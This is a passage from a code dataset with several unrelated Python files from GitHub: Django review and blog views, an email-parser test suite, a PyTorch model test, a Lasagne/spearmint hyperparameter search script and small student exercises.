elif sentiment < -0.2:\n categorized_news['sad'] += 1\n elif sentiment > 0:\n categorized_news['optimistic'] += 1\n elif sentiment < 0:\n categorized_news['pessimistic'] += 1\n else:\n categorized_news['angry'] += 1\n\n return categorized_news\n\nif __name__ == '__main__':\n # Run the app server on localhost:5000\n app.run('localhost', 5000)","repo_name":"danish-ali/CapstoneBackend","sub_path":"NewsService.py","file_name":"NewsService.py","file_ext":"py","file_size_in_byte":1863,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15901051989","text":"\nfrom django.db.models import CharField, Value, Q\nfrom django.db import IntegrityError\nfrom django.shortcuts import get_object_or_404, redirect, render\nfrom django.contrib.auth.decorators import login_required\n\nfrom . import forms\nfrom authentication import models as auth_models\nfrom review import models as review_models\nfrom review.forms import ReviewForm, TicketForm\n\nfrom itertools import chain\n\n# Create your views here.\n\n\ndef collect_followers(current_user):\n followers_queryset = current_user.followers.all()\n followers = [follower for follower in followers_queryset]\n followers.append(current_user)\n return followers\n\n\ndef collect_tickets(current_user):\n followers = collect_followers(current_user)\n tickets_raw = review_models.Ticket.objects.filter(user__in=followers)\n tickets = tickets_raw.annotate(content_type=Value('ticket', CharField()))\n return tickets\n\n\ndef collect_reviews(current_user):\n followers = collect_followers(current_user)\n review_raw = review_models.Review.objects.filter(\n Q(user__in=followers) | Q(ticket__user=current_user))\n review = review_raw.annotate(content_type=Value('review', CharField()))\n return review\n\n\n@login_required\ndef home(request):\n tickets = collect_tickets(request.user)\n reviews = collect_reviews(request.user)\n feed_ready = sorted(chain(tickets, reviews),\n key=lambda post: post.time_created, reverse=True)\n return render(request, \"review/home.html\",\n context={\"feed_ready\": feed_ready})\n\n\n@login_required\ndef your_post(request):\n tickets_raw = review_models.Ticket.objects.filter(user=request.user)\n tickets = tickets_raw.annotate(content_type=Value('ticket', CharField()))\n reviews_raw = review_models.Review.objects.filter(user=request.user)\n reviews = reviews_raw.annotate(content_type=Value('review', CharField()))\n posts = sorted(chain(tickets, reviews),\n key=lambda post: post.time_created, reverse=True)\n\n return render(request, \"review/yourpost.html\", context={\"posts\": posts})\n\n\n@login_required\ndef follows(request):\n user_follows = request.user.followers.all()\n following_users = review_models.UserFollows.objects.filter(\n followed_user=request.user)\n form = forms.addFollowForm()\n message = \"\"\n if request.method == \"POST\":\n form = forms.addFollowForm(request.POST)\n if form.is_valid():\n user_to_add = form.cleaned_data[\"followed_user_name\"]\n if not auth_models.CustomUser.objects.filter(\n username=user_to_add).exists():\n message = \"L'utilisateur n'existe pas\"\n else:\n current_user = request.user\n if not current_user.username != user_to_add:\n message = \"Vous ne pouvez pas vous suivre vous même\"\n else:\n user_to_follow = auth_models.CustomUser.objects.get(\n username=user_to_add)\n try:\n follow = review_models.UserFollows()\n follow.user = request.user\n follow.followed_user = user_to_follow\n follow.save()\n message = f\"Vous suivez désormais {user_to_follow}\"\n except IntegrityError:\n message = f\"vous suivez déjà {user_to_add}\"\n\n return render(request, \"review/follows.html\",\n context={\"form\": form, \"message\": message,\n \"user_follows\": user_follows,\n \"following_users\": following_users})\n\n\n@login_required\ndef ticket(request):\n form = forms.TicketForm()\n if request.method == \"POST\":\n form = forms.TicketForm(request.POST, request.FILES)\n if form.is_valid():\n ticket = form.save(commit=False)\n ticket.user = request.user\n ticket.save()\n return redirect(\"home\")\n return render(request, \"review/ticket.html\", context={\"form\": form})\n\n\n@login_required\ndef ticket_and_review_upload(request):\n ticket_form = forms.TicketForm()\n review_form = forms.ReviewForm()\n if request.method == \"POST\":\n ticket_form = forms.TicketForm(request.POST, request.FILES)\n review_form = forms.ReviewForm(request.POST)\n if any([ticket_form.is_valid(), review_form.is_valid()]):\n ticket = ticket_form.save(commit=False)\n ticket.user = request.user\n ticket.review_count = 1\n ticket.save()\n review = review_form.save(commit=False)\n review.user = request.user\n review.ticket = ticket\n review.save()\n return redirect(\"home\")\n context = {\"ticket_form\": ticket_form,\n \"review_form\": review_form,\n }\n return render(request, \"review/fullreview.html\", context=context)\n\n\n@login_required\ndef ticket_update(request, id):\n ticket = review_models.Ticket.objects.get(id=id)\n if ticket.user == request.user:\n if request.method == 'POST':\n form = TicketForm(request.POST, request.FILES, instance=ticket)\n if form.is_valid():\n form.save()\n return redirect(\"home\")\n else:\n form = TicketForm(instance=ticket)\n return render(request, \"review/ticket_update.html\",\n {\"form\": form, \"post\": ticket})\n else:\n message = \"Vous ne pouvez pas modifier \\\n un ticket crée par un autre utilisateur\"\n return render(request,\n \"review/ticket_update.html\",\n {\"message\": message})\n\n\n@login_required\ndef review_update(request, id):\n review = get_object_or_404(review_models.Review, id=id)\n if review.user == request.user:\n if request.method == 'POST':\n form = ReviewForm(request.POST, instance=review)\n if form.is_valid():\n form.save()\n return redirect(\"home\")\n else:\n form = ReviewForm(instance=review)\n return render(request,\n \"review/review_update.html\",\n {\"form\": form, \"post\": review})\n else:\n message = \"Vous ne pouvez pas modifier une critique \\\n crée par un autre utilisateur\"\n return render(request,\n \"review/review_update.html\",\n {\"message\": message})\n\n\n@login_required\ndef delete_ticket(request, id):\n ticket_to_delete = review_models.Ticket.objects.get(id=id)\n if ticket_to_delete.user == request.user:\n if request.method == \"POST\":\n ticket_to_delete.delete()\n return redirect(\"home\")\n return render(request,\n \"review/delete_ticket.html\",\n {\"post\": ticket_to_delete})\n else:\n message = \"Vous ne pouvez pas supprimer un \\\n ticket crée par un autre utilisateur\"\n return render(request,\n \"review/ticket_update.html\",\n {\"message\": message})\n\n\n@login_required\ndef delete_review(request, id):\n review_to_delete = review_models.Review.objects.get(id=id)\n ticket = review_to_delete.ticket\n if review_to_delete.user == request.user:\n if request.method == \"POST\":\n review_to_delete.delete()\n ticket.review_count = 0\n ticket.save()\n return redirect(\"home\")\n return render(request,\n \"review/review_delete.html\",\n {\"post\": review_to_delete})\n else:\n message = \"Vous ne pouvez pas supprimer un \\\n ticket crée par un autre utilisateur\"\n return render(request,\n \"review/review_delete.html\",\n {\"message\": message})\n\n\n@login_required\ndef delete_follower(request, key_id):\n user_to_unfollow = auth_models.CustomUser.objects.get(id=key_id)\n follow_relation = review_models.UserFollows.objects.filter(\n user=request.user, followed_user=user_to_unfollow)\n if request.method == \"POST\":\n follow_relation.delete()\n return redirect(\"follows\")\n return render(request,\n \"review/delete_follower.html\",\n {\"followed_user\": user_to_unfollow})\n\n\n@login_required\ndef answer_ticket(request, id):\n form = forms.ReviewForm()\n ticket = review_models.Ticket.objects.get(id=id)\n if ticket.review_count != 0:\n message = \"Ce ticket a déjà une critique, \\\n vous ne pouvez en créer une nouvelle\"\n return render(request,\n \"review/create_review.html\",\n {\"message\": message})\n else:\n if request.method == \"POST\":\n form = forms.ReviewForm(request.POST)\n if form.is_valid():\n ticket.review_count = 1\n review = form.save(commit=False)\n review.user = request.user\n review.ticket = ticket\n ticket.save()\n review.save()\n return redirect(\"home\")\n return render(request,\n \"review/create_review.html\",\n {\"form\": form, \"post\": ticket})\n","repo_name":"ClemRoy/litreview","sub_path":"review/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9259,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"9910387017","text":"\nfrom typing import Dict, Any, Union, Optional, List, Callable\nfrom omegaconf import ListConfig, DictConfig\nimport importlib\nimport functools\nimport re\nimport cm.dist_util as dist\n\n\nLOG_FN_BLACKLIST = [\n \"cm.yt.processing.*\",\n \"cm.yt.encoding.*\",\n \"torch.randn_like\",\n]\n\n\ndef instantiate_from_config(config: Dict, *args, **kwargs):\n if \"target\" not in config:\n raise KeyError(\"Expected key `target` to instantiate.\")\n params = config.get(\"params\", dict())\n target = config[\"target\"]\n if re.search(\"|\".join(LOG_FN_BLACKLIST), target) is None:\n dist.print0(f\"Instantiating {config['target']} with params {params}\")\n return get_obj_from_str(target)(*args, **params, **kwargs)\n\n\ndef get_obj_from_str(string: str, reload: bool = False):\n module, cls = string.rsplit(\".\", 1)\n if reload:\n module_imp = importlib.import_module(module)\n importlib.reload(module_imp)\n return getattr(importlib.import_module(module, package=None), cls)\n\n\ndef getattr_nested(obj, dot_separated_names):\n return functools.reduce(getattr, [obj] + dot_separated_names.split(\".\"))\n\n\ndef call_with_remap(\n function: Callable,\n data: Dict[str, Any],\n in_map: Union[List[str], Dict[str, str]],\n out_map: Optional[Union[str, List[str]]] = None,\n overwrite: bool = False,\n):\n if isinstance(in_map, list) or isinstance(in_map, ListConfig):\n # get and remap list inputs\n inputs = [data[key] if isinstance(key, str) else key for key in in_map]\n in_cols = in_map\n # process data\n result = function(*inputs)\n elif isinstance(in_map, dict) or isinstance(in_map, DictConfig):\n # get and remap dict inputs\n inputs = {\n key: data[val] if isinstance(val, str) else val\n for key, val in in_map.items()\n }\n in_cols = in_map.values()\n # process data\n result = function(**inputs)\n else:\n raise TypeError(\n f\"Type of in_map has to be either dict for keyword arguments or list. \"\n f\"for positional arguments, but got {type(in_map)}.\"\n )\n\n # remap outputs\n if out_map is not None:\n if isinstance(result, tuple):\n assert isinstance(out_map, list) or isinstance(\n out_map, ListConfig\n ), f\"Function returns multiple objects, out_map has to be list.\"\n assert len(result) == len(\n out_map\n ), f\" Amount of result items and out_map items must be the same, but {len(result)} and {len(out_map)}.\"\n # check that out_map names is not in data\n for name in out_map:\n assert (\n overwrite or name not in data or name in in_cols or name == \"_\"\n ), f\"Result key {name} is going to overwrite correspondent name in input data.\"\n result = {key: val for key, val in zip(out_map, result) if key != \"_\"}\n else:\n assert isinstance(\n out_map, str\n ), f\"Function doesn't return multiple objects, out_map has to be single str.\"\n if out_map != \"_\":\n assert (\n overwrite or out_map not in data or out_map in in_cols\n ), f\"Result key {out_map} is going to overwrite correspondent name in input data.\"\n result = {out_map: result}\n else:\n # if out_map is not specified - use the same name as input\n assert not isinstance(\n result, tuple\n ), f\"Can't infer output name, please, specify out_map.\"\n result = {list(in_map.values())[0]: result}\n return result","repo_name":"quickjkee/t2i_sd","sub_path":"consistency_models-sd/cm/yt/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3623,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"167050819","text":"try:\n import address_parser\nexcept:\n import mail.catdog.address_parser.cython.address_parser as address_parser\n\nimport unittest\n\n\nclass Base(unittest.TestCase):\n def check_recipient(self, recipients, size=1, at=0, **kwargs):\n self.assertEqual(len(recipients), size)\n rec = recipients[at]\n\n self.assertEqual(rec.display_name, kwargs['display_name'])\n self.assertEqual(rec.local, kwargs['local'])\n self.assertEqual(rec.domain, kwargs['domain'])\n self.assertEqual(rec.email, kwargs['email'])\n self.assertEqual(rec.valid, kwargs['valid'])\n\n\nclass CheckAddressParserDomainAndDisplayNameConditions(Base):\n def test_parse_single_address_without_display_name(self):\n self.check_recipient(address_parser.parse_recipients('a@yandex.ru'),\n display_name='', local='a', domain='yandex.ru', email='a@yandex.ru', valid=True)\n\n def test_address_with_display_name(self):\n self.check_recipient(address_parser.parse_recipients('\"Ололо, привет\" a@yandex.ru'),\n display_name='\"Ололо, привет\"', local='a', domain='yandex.ru',\n email='\"Ололо, привет\" ', valid=True)\n\n def test_parse_address_with_russian_domain(self):\n self.check_recipient(address_parser.parse_recipients('a@яндекс.рф'),\n display_name='', local='a', domain='яндекс.рф', email='a@яндекс.рф', valid=True)\n\n def test_parse_address_with_punycode_domain(self):\n self.check_recipient(address_parser.parse_recipients('a@xn--d1acpjx3f.xn--p1ai'),\n display_name='', local='a', domain='xn--d1acpjx3f.xn--p1ai',\n email='a@xn--d1acpjx3f.xn--p1ai', valid=True)\n\n def test_local_and_domain_to_lower_case(self):\n self.check_recipient(address_parser.parse_recipients('A@Yandex.ru'),\n display_name='', local='a', domain='yandex.ru', email='a@yandex.ru', valid=True)\n\n\nclass ValidAndInvalidCases(Base):\n def test_valid_email_with_display_name(self):\n self.check_recipient(address_parser.parse_recipients('\"Hello, world\" '),\n display_name='\"Hello, world\"', local='a', domain='yandex.ru',\n email='\"Hello, world\" ', valid=True)\n\n def test_valid_email_with_display_name_without_angle_brackets(self):\n self.check_recipient(address_parser.parse_recipients('\"Hello, world\" a@yandex.ru'),\n display_name='\"Hello, world\"', local='a', domain='yandex.ru',\n email='\"Hello, world\" ', valid=True)\n\n def test_invalid_email_with_empty_local(self):\n self.check_recipient(address_parser.parse_recipients('\"Hello, world\" @yandex.ru'),\n display_name='', local='\"hello, world\"', domain='yandex.ru',\n email='\"hello, world\"@yandex.ru', valid=False)\n\n self.check_recipient(address_parser.parse_recipients('\"Hello, world\" <@yandex.ru>'),\n display_name='', local='', domain='', email='\"Hello, world\" <@yandex.ru>', valid=False)\n\n def test_invalid_email_with_empty_domain(self):\n s = '\"Hello, world\" a@'\n self.check_recipient(address_parser.parse_recipients(s),\n display_name='', local='', domain='', email=s, valid=False)\n\n def test_invalid_yandex_email(self):\n self.check_recipient(address_parser.parse_recipients('_@ya.ru'),\n display_name='', local='_', domain='ya.ru', email='_@ya.ru', valid=False)\n\n self.check_recipient(address_parser.parse_recipients('_@mail.ru'),\n display_name='', local='_', domain='mail.ru', email='_@mail.ru', valid=True)\n\n def test_invalid_percent_hack_email(self):\n s = 'ololo a%b.ru@ya.ru'\n self.check_recipient(address_parser.parse_recipients(s),\n display_name='ololo', local='a%b.ru', domain='ya.ru', email='ololo ', valid=False)\n\n\nclass GroupParsingCases(Base):\n def test_valid_two_emails(self):\n a = address_parser.parse_recipients('\"Hello, world\" , \"World, hello\" ')\n self.check_recipient(a, size=2, at=0,\n display_name='\"Hello, world\"', local='a', domain='yandex.ru',\n email='\"Hello, world\" ', valid=True)\n self.check_recipient(a, size=2, at=1,\n display_name='\"World, hello\"', local='b', domain='mail.ru',\n email='\"World, hello\" ', valid=True)\n\n def test_three_emails_the_second_is_invalid(self):\n a = address_parser.parse_recipients('\"Hello, world\" , \"World, hello\" <_@yandex.ru>, c@ya.ru')\n self.check_recipient(a, size=3, at=0,\n display_name='\"Hello, world\"', local='a', domain='yandex.ru',\n email='\"Hello, world\" ', valid=True)\n self.check_recipient(a, size=3, at=1,\n display_name='\"World, hello\"', local='_', domain='yandex.ru',\n email='\"World, hello\" <_@yandex.ru>', valid=False)\n self.check_recipient(a, size=3, at=2,\n display_name='', local='c', domain='ya.ru',\n email='c@ya.ru', valid=True)\n\n def test_email_is_garbage(self):\n self.check_recipient(address_parser.parse_recipients('asdfasdfasd fasdfajsdf'),\n display_name='', local='', domain='', email='asdfasdfasd fasdfajsdf', valid=False)\n\n def test_email_with_garbage(self):\n a = address_parser.parse_recipients('a@ya.ru, asdfasdfasd fasdfajsdf, c@ya.ru')\n self.check_recipient(a, size=2, at=0,\n display_name='', local='a', domain='ya.ru', email='a@ya.ru', valid=True)\n\n self.check_recipient(a, size=2, at=1,\n display_name='', local='', domain='', email='a@ya.ru, asdfasdfasd fasdfajsdf, c@ya.ru', valid=False)\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"mail/tests/test_address_parser.py","file_name":"test_address_parser.py","file_ext":"py","file_size_in_byte":6258,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72752037034","text":"from django.shortcuts import render, redirect, get_object_or_404\nfrom django.http import HttpResponse, Http404\nfrom django.urls import reverse, reverse_lazy\nfrom django.utils.text import slugify\nfrom django.contrib import messages\nfrom django.core.exceptions import PermissionDenied\n\nfrom django.contrib.messages.views import SuccessMessageMixin\nfrom django.views.generic import ListView, CreateView, DetailView, DeleteView\n\nfrom django.utils.translation import ugettext as _\nfrom django.utils.translation import ungettext\nfrom django.core.paginator import Paginator, EmptyPage\nfrom datetime import datetime\nfrom blog.models import Article\nfrom .forms import ArticleForm\nfrom django.contrib.auth.decorators import permission_required\nfrom django.contrib.auth.models import Permission\nfrom django.contrib.contenttypes.models import ContentType\n\n# def home(request):\n# articles = Article.objects.all()\n#\n# return render(request, 'blog/home.html.twig',locals())\n\nclass DeleteArticle(DeleteView):\n model = Article\n template_name = 'blog/delete_article.html.twig'\n context_object_name = 'article'\n success_url = reverse_lazy('home')\n\n def get_object(self, queryset = None):\n slug = self.kwargs['slug']\n return get_object_or_404(Article, slug = slug)\n\nclass DetailArticle(DetailView):\n model = Article\n template_name = 'blog/read.html.twig'\n\ndef test_i18n(request):\n nb_chats = 1\n couleur = 'blanc'\n chaine = _('Bonjour les nouveaux !')\n ip = _('Votre ip est %s') % request.META['REMOTE_ADDR']\n infos = ungettext('... et selon mes infos , vous avez %(nb)d chat %(col)s',\n '... et selon mes infos , vous avez %(nb)d chats %(col)ss', nb_chats) % {'nb':nb_chats, 'col':couleur}\n return render(request, 'blog/i18n.html.twig', locals())\n\n@permission_required('blog.add_article')\ndef createArticle(request):\n if request.method == 'POST':\n form = ArticleForm(request.POST)\n if form.is_valid():\n cleaned_data = form.cleaned_data\n a = Article(titre = cleaned_data['titre'],\n content= cleaned_data['content'],\n auteur = request.user,\n categorie = cleaned_data['categorie'])\n a.save()\n contenttype = ContentType.objects.get(app_label = 'blog', model = 'Article')\n perm1 = Permission.objects.create(\n codename = 'change_article_%d'%a.id,\n name = \"Modifier l'article %d\"%a.id,\n content_type = contenttype\n )\n perm2 = Permission.objects.create(\n codename = 'delete_article_%d'%a.id,\n name = \"Supprimer l'article %d\"%a.id,\n content_type = contenttype\n )\n request.user.user_permissions.add(perm1)\n request.user.user_permissions.add(perm2)\n\n messages.success(request, 'L\\'article \"%s\" a bien été ajouté !'%cleaned_data['titre'])\n return redirect(reverse('article_by_slug', kwargs = {'slug':a.slug}))\n form = ArticleForm(request.POST or None)\n return render(request, 'blog/article_form.html.twig', locals())\n\n\n\n@permission_required('blog.change_article')\ndef updateArticle(request, slug):\n a = get_object_or_404(Article, slug = slug)\n if request.user.has_perm('blog.change_article_%d'%(a.id)):\n if request.method == 'POST':\n form = ArticleForm(request.POST)\n if form.is_valid():\n cleaned_data = form.cleaned_data\n a.titre = cleaned_data['titre']\n a.content= cleaned_data['content']\n a.auteur = request.user\n a.categorie = cleaned_data['categorie']\n a.save()\n\n messages.success(request, 'L\\'article \"%s\" a bien été modifié !'%cleaned_data['titre'])\n return redirect(reverse('article_by_slug', kwargs = {'slug':a.slug}))\n form = ArticleForm(instance = a)\n return render(request, 'blog/article_form.html.twig', locals())\n else:\n raise PermissionDenied\n\ndef listArticles(request, page = 1):\n articles = Article.objects.order_by('-date')\n pages = Paginator(articles, 5)\n try:\n articles = pages.page(page)\n except EmptyPage:\n articles = pages.page(pages.num_pages)\n return render(request, 'blog/home.html.twig', locals())\n\ndef userArticles(request, page = 1):\n articles = Article.objects.filter(auteur=request.user).order_by('-date')\n pages = Paginator(articles, 5)\n try:\n articles = pages.page(page)\n except EmptyPage:\n articles = pages.page(pages.num_pages)\n return render(request, 'blog/home.html.twig', locals())\n\n\n\ndef read_article_by_slug(request, slug):\n article = get_object_or_404(Article, slug=slug)\n return render(request, 'blog/read.html.twig', {'article':article})\n\n\ndef read_article(request, id):\n article = get_object_or_404(Article, id=id)\n return render(request, 'blog/read.html.twig', {'article':article})\n","repo_name":"Bozo-max/crepes_bretonnes","sub_path":"blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5031,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"34623403481","text":"meses = [\"janeiro\", \"fevereiro\", \"marco\", \"abril\", \"maio\", \"junho\", \"julho\", \"agosto\", \"setembro\", \"outubro\", \"novembro\", \"dezembro\"]\nlistaPluviosidade = []\nmesesNovos = []\n\nfor mes in meses:\n print(\"pluviosidade do mes\", mes, \": \", end=\"\")\n pluviosidade = int(input(\"\"))\n listaPluviosidade.append(pluviosidade)\n\ndef funPluviosidade(meses, listaPluviosidade, mesesNovos):\n copiaLista = listaPluviosidade.copy()\n copiaLista.sort()\n for n in copiaLista:\n mesesNovos.append(meses[listaPluviosidade.index(n)])\n print(\" \")\n for i in range(len(meses)):\n print(\"pluviosidade do mes \", mesesNovos[i], \": \", copiaLista[i])\nfunPluviosidade(meses, listaPluviosidade, mesesNovos)","repo_name":"Mohaamedl/Exs-py","sub_path":"ficha6/ex6.py","file_name":"ex6.py","file_ext":"py","file_size_in_byte":705,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"35936693845","text":"import torch\nfrom torch import nn\nfrom torch.utils.data import DataLoader\nfrom nn.switchnet import SwitchForward, SwitchInverse\nfrom loss.customloss import CMSELoss\nfrom data.cranddataset import CRandDataset\nfrom data.scattering.scattering import ScatteringDataSet\nfrom train.train import ctrain_loop, ctest_loop\n\n# N - M + w - 1 should be even\nt = 4\nPd = 3**2\nPx = 9**2\nN = 81\nw = 11\nalpha = 24\nL = 3\nM = 81\nNsample = 1024\ndevice = 'cuda' if torch.cuda.is_available() else 'cpu'\n\nlearning_rate = 0.002\nbatch_size = 64\nepoches = 5\n\nfilename = 'data/scafull2.h5'\ntrain_data = ScatteringDataSet(filename)\ntrain_dataloader = DataLoader(train_data, batch_size=batch_size)\ntestfile = 'data/scafull2_test.h5'\ntest_data = ScatteringDataSet(testfile)\ntest_dataloader = DataLoader(test_data, batch_size=1)\n\nmodel = SwitchForward(t, Pd, Px, N, w, alpha, L, M, device).float()\nloss_fn = CMSELoss()\noptimizer = torch.optim.Adam(model.parameters(), lr=learning_rate)\n\n\nctrain_loop(train_dataloader, model, loss_fn, optimizer, epoches=epoches)\nctest_loop(test_dataloader, model, loss_fn)","repo_name":"qiyuanpang/codes","sub_path":"test_switchnet.py","file_name":"test_switchnet.py","file_ext":"py","file_size_in_byte":1073,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"36415766618","text":"#!/usr/bin/python3\n\ndef magic_calculation(a, b):\n \"\"\"My magic calculation function\n\n Translated from bytecode\n Makes use of add() and sub() functions from magic_calculation_102 module\n\n Args:\n a: first integer\n b: second integer\n\n Returns:\n The resulting value of sub(a, b) or c\n \"\"\"\n from magic_calculation_102 import add, sub\n\n if a < b:\n c = add(a, b)\n else:\n return sub(a, b)\n\n for i in range(4, 6):\n c = add(c, i)\n return c\n","repo_name":"chee-zaram/alx-higher_level_programming","sub_path":"0x02-python-import_modules/102-magic_calculation.py","file_name":"102-magic_calculation.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"72933504553","text":"import sys\nimport os\nimport time\n\nimport numpy as np\nimport theano\nimport theano.tensor as T\n#from theano.compile.nanguardmode import NanGuardMode\nimport numpy as np\n\nimport lasagne as nn\n\nimport importlib.util\n\nfrom datetime import datetime, timedelta\nimport pickle\nimport string\n\nimport matplotlib\nmatplotlib.use('agg')\nimport pylab as plt\n\nimport generators\nfrom utils import accounting\nfrom utils import train_utils\nfrom utils import network_repr\n\nimport simple_spearmint\n\nif len(sys.argv) < 2:\n sys.exit(\"Usage: train_by_spearmint.py \")\n\nmodel_config = sys.argv[1]\nmodel_path_name = os.path.join(os.path.expanduser(os.getcwd()),'models',model_config)\nspec = importlib.util.spec_from_file_location(model_config, model_path_name)\nmodel_module = importlib.util.module_from_spec(spec)\nspec.loader.exec_module(model_module)\n \nexpid = accounting.generate_expid(model_config)\nexpid = expid.split('/')[-1]\nprint(\"Experiment ID: \", expid)\n\nprint(\"...get the relevant model paremeter search space, set up spearmint\")\nmodel_params_dict = model_module.model_params_dict\nss = simple_spearmint.SimpleSpearmint(model_params_dict, minimize=False)\n\n# Define an objective function, must return a scalar value\ndef objective(params_dict, model_module):\n \n try:\n print(\"...Build model\")\n model = model_module.build_model(params_dict)\n except:\n print(\"Model configuration was invalid, trying another one...\")\n return 0.1\n\n if len(model) == 4:\n l_in, l_out, l_resume, l_exclude = model\n elif len(model) == 3:\n l_in, l_out, l_resume = model\n l_exclude = l_in\n else:\n l_in, l_out = model\n l_resume = l_out\n l_exclude = l_in\n\n\n all_layers = nn.layers.get_all_layers(l_out)\n num_params = nn.layers.count_params(l_out)\n\n print(\"...number of parameters: \", num_params)\n\n x_shared = nn.utils.shared_empty(dim=len(l_in.output_shape)) \n y_shared = nn.utils.shared_empty(dim=2) \n t = nn.utils.shared_empty(dim=2) ### target shared var per batch\n valid_output = nn.layers.get_output(l_out, deterministic=True) ### no dropout for validation \n\n idx = T.lscalar('idx')\n\n givens = {\n t: y_shared[idx*model_module.batch_size:(idx+1)*model_module.batch_size],\n l_in.input_var: x_shared[idx*model_module.batch_size:(idx+1)*model_module.batch_size],\n }\n\n if hasattr(model_module, 'build_objective'):\n train_loss = model_module.build_objective(l_in, l_out, t, training_mode=True)\n else:\n train_loss = nn.objectives.aggregate(nn.objectives.binary_crossentropy(l_out, t))\n\n all_excluded_params = nn.layers.get_all_params(l_exclude)\n all_params = nn.layers.get_all_params(l_out)\n all_params = list(set(all_params) - set(all_excluded_params))\n\n if hasattr(model_module, 'learning_rate_schedule'):\n learning_rate_schedule = model_module.learning_rate_schedule\n else:\n learning_rate_schedule = { 0: model_module.learning_rate }\n \n learning_rate = theano.shared(np.float32(learning_rate_schedule[0]))\n\n if hasattr(model_module, 'build_updates'):\n updates = model_module.build_updates(train_loss, all_params, learning_rate, model_module.momentum)\n else:\n updates = nn.updates.rmsprop(train_loss, all_params, learning_rate, 0.9)\n\n if hasattr(model_module, 'censor_updates'):\n updates = model_module.censor_updates(updates, l_out)\n\n iter_train = theano.function([idx], train_loss, givens=givens, updates=updates)\n compute_output = theano.function([idx], valid_output, givens=givens, on_unused_input=\"ignore\") \n chunks_train_idcs = range(model_module.num_chunks_train)\n losses_valid_auc = []\n losses_valid_aupr = []\n losses_train = []\n losses_valid_log = []\n\n model_module.data_loader.load_train()\n\n if hasattr(model_module, 'task_type'):\n task_type = model_module.task_type\n else:\n task_type = 'mt_classification'\n\n if hasattr(model_module, 'create_train_gen'):\n create_train_gen = model_module.create_train_gen\n else:\n create_train_gen = lambda: model_module.data_loader.create_batch_gen()\n\n if hasattr(model_module, 'create_valid_gen'):\n create_valid_gen = model_module.create_valid_gen\n else:\n create_valid_gen = lambda: model_module.data_loader.create_valid_gen()\n\n if hasattr(model_module, 'num_epochs'):\n num_epochs = model_module.num_epochs\n else:\n num_epochs = 15\n \n print(\"...Training model for \", num_epochs, \" epochs (less early stopping)\")\n num_batches_chunk = model_module.chunk_size // model_module.batch_size\n\n for epoch in range(num_epochs):\n\n ### train in chunks\n epoch_train_loss = []\n epoch_start_time = time.time()\n for e, (x_chunk, y_chunk) in zip(chunks_train_idcs, create_train_gen()):\n \n if e in learning_rate_schedule:\n lr = np.float32(learning_rate_schedule[e])\n learning_rate.set_value(lr)\n \n x_shared.set_value(x_chunk)\n y_shared.set_value(y_chunk)\n losses = []\n for b in range(num_batches_chunk):\n loss = iter_train(b)\n outs = compute_output(b)\n if np.isnan(loss):\n raise RuntimeError(\"NaN DETECTED.\")\n losses.append(loss)\n \n mean_train_loss = np.mean(losses)\n epoch_train_loss.append(mean_train_loss)\n \n epoch_end_time = time.time()\n losses_train.append(epoch_train_loss)\n print(\"Mean training loss:\\t\\t {0:.6f}.\".format(np.mean(epoch_train_loss))) ### dump these to a text file somewhere else...\n print(\"Training for epoch \", epoch, \" took \", epoch_end_time - epoch_start_time, \"s\", flush=True)\n \n ### Do we validate?\n if ((epoch + 1) % model_module.validate_every) == 0:\n print(\"Validating...\")\n \n outputs = []\n labels = []\n for x_chunk_valid, y_chunk_valid in create_valid_gen():\n num_batches_chunk_valid = x_chunk_valid.shape[0] // model_module.batch_size\n\n x_shared.set_value(x_chunk_valid)\n\n outputs_chunk = []\n for b in range(num_batches_chunk_valid):\n out = compute_output(b)\n outputs_chunk.append(out)\n\n outputs_chunk = np.vstack(outputs_chunk)\n #outputs_chunk = outputs_chunk[:chunk_length_eval] # truncate to the right length\n outputs.append(outputs_chunk)\n labels.append(y_chunk_valid)\n\n\n outputs = np.vstack(outputs) ### dump these to a list, pickle the list\n loss = train_utils.log_loss(outputs, np.vstack(labels))\n if task_type != 'mt_classificaiton':\n acc = train_utils.st_accuracy(outputs, np.vstack(labels))\n else:\n acc = train_utils.mt_accuracy(outputs, np.vstack(labels))\n precision = train_utils.mt_avg_precision(outputs, np.vstack(labels))\n print(\" validation loss:\\t {0:.6f}.\".format(loss)) ### dump these to a text file somewhere else\n print(\" validation roc:\\t {0:.2f}.\".format(acc * 100))\n losses_valid_log.append(loss)\n losses_valid_auc.append(acc)\n del outputs\n \n return max(losses_valid_auc)\n\n\n# Seed with 5 randomly chosen parameter settings\n# (this step is optional, but can be beneficial)\nfor n in range(5):\n # Get random parameter settings\n suggestion = ss.suggest_random()\n \n # Retrieve an objective value for these parameters\n value = objective(suggestion, model_module)\n print(\"Random trial {}: {} -> {}\".format(n + 1, suggestion, value))\n \n # Update the optimizer on the result\n ss.update(suggestion, value)\n\n# Run for 50 hyperparameter optimization trials\nfor n in range(50):\n \n # Get a suggestion from the optimizer\n suggestion = ss.suggest()\n \n # Get an objective value\n value = objective(suggestion, model_module)\n print(\"GP trial {}: {} -> {}\".format(n + 1, suggestion, value))\n \n # Update the optimizer on the result\n ss.update(suggestion, value)\n best_parameters, best_objective = ss.get_best_parameters()\n print(\"Best parameters {} for objective {}\".format(best_parameters, best_objective))\n\n \n \n","repo_name":"lzamparo/SeqDemote","sub_path":"src/train_by_spearmint.py","file_name":"train_by_spearmint.py","file_ext":"py","file_size_in_byte":8515,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"10393013189","text":"# https://www.acmicpc.net/problem/3009\n\nx, y = [], []\nfor _ in 